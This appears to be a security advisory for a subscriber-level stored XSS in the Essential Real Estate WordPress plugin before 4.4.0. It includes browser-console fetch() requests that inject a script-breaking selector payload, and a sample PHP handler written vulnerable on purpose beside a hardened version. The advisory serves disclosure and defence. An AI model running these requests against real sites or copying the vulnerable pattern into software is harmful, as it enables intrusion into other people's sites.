wpexploit | Krzysztof Zając (CERT PL) | WPEX-ID: DF12513B-9664-45BE-8824-2924BFDDF364
History: Dec 18, 2023 - 12:00 a.m.

Essential Real Estate < 4.4.0 - Subscriber+ Stored XSS

Tags: real estate, subscriber, stored xss, font manipulation, security exploit, vulnerable site

AI Score: 5.8 | Confidence: High | EPSS: 0 | Percentile: 14.0%

Description: The plugin does not apply proper capability checks on its AJAX actions, which, among other things, allows attackers with a subscriber account to conduct Stored XSS attacks.

1. Login with a subscriber account, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. Paste the following in your browser's console:
```
// The nonce is read from the plugin's GSF_META_DATA object, which is available
// in the page's JavaScript context for any logged-in user.
fetch("/wp-admin/admin-ajax.php?action=gsf_change_font", {
  method: "POST",
  headers: { "content-type": "application/x-www-form-urlencoded" },
  body: `_nonce=${GSF_META_DATA['nonce']}&font_data[kind]=custom&font_data[selector]=ppppp`,
}).then((response) => response.text()).then((data) => { console.log(data); });
```
3. And then the following:
```
// Same nonce; the selector value is what later breaks out of the inline script.
fetch("/wp-admin/admin-ajax.php?action=gsf_save_active_font", {
  method: "POST",
  headers: { "content-type": "application/x-www-form-urlencoded" },
  body: `_nonce=${GSF_META_DATA['nonce']}&font[0][kind]=custom&font[0][selector]=");alert(1);//`,
}).then((response) => response.text()).then((data) => { console.log(data); });
```
4. Visit the site to witness our malicious script running, triggering an alert box.
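As an added example (hypothetical code, not the plugin's own), the following sketches a WordPress admin-ajax handler in the shape the steps above exploit, beside a hardened version: the vulnerable one verifies only the nonce (which the page hands to every logged-in user, subscribers included) and later concatenates the stored selector into inline JavaScript, while the hardened one requires a capability, sanitises the input and emits the value as a JSON-encoded literal. Function, option and nonce-action names are assumptions.

```php
<?php
// Added example (hypothetical, not the plugin's code): an admin-ajax handler
// that stores a font "selector", in the vulnerable shape and hardened.
// Option, nonce-action and function names are assumptions.

// --- Vulnerable shape: nonce only, no capability check, raw output ---------
function example_save_font_vulnerable() {
    // The nonce shows the request came from this site's own page; every
    // logged-in user, subscribers included, is issued one. It is not an
    // authorisation check, so anyone with an account reaches update_option().
    check_ajax_referer( 'gsf_nonce_action', '_nonce' );
    $font = isset( $_POST['font'] ) ? wp_unslash( $_POST['font'] ) : array();
    update_option( 'example_active_font', $font ); // rendered for all visitors
    wp_send_json_success();
}
function example_print_font_vulnerable() {
    $font     = get_option( 'example_active_font', array() );
    $selector = isset( $font[0]['selector'] ) ? $font[0]['selector'] : '';
    // Concatenated straight into a JS string literal: a stored value holding
    // a quote terminates the literal and the rest runs on every page load.
    echo '<script>applyFont("' . $selector . '");</script>';
}

// --- Hardened: capability check, sanitised input, escaped output -----------
add_action( 'wp_ajax_gsf_save_active_font', 'example_save_font_hardened' );
function example_save_font_hardened() {
    check_ajax_referer( 'gsf_nonce_action', '_nonce' );
    // Site-wide font settings are an admin/theme-level change: require the
    // matching capability, which subscribers do not hold.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // sends JSON and exits
    }
    $raw  = isset( $_POST['font'] ) ? (array) wp_unslash( $_POST['font'] ) : array();
    $font = array();
    foreach ( $raw as $entry ) {
        $font[] = array(
            'kind'     => sanitize_key( $entry['kind'] ?? '' ),
            'selector' => sanitize_text_field( $entry['selector'] ?? '' ),
        );
    }
    update_option( 'example_active_font', $font );
    wp_send_json_success();
}
function example_print_font_hardened() {
    $font     = get_option( 'example_active_font', array() );
    $selector = isset( $font[0]['selector'] ) ? $font[0]['selector'] : '';
    // wp_json_encode() yields a quoted JS literal with quotes and "/" escaped,
    // so the stored value can neither end the string nor close the script tag.
    echo '<script>applyFont(' . wp_json_encode( $selector ) . ');</script>';
}
```

Input sanitisation alone does not fix the output sink: sanitize_text_field() keeps quotes, so the capability check stops the unprivileged write and the JSON encoding stops the injection even if a privileged user saves an odd value.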

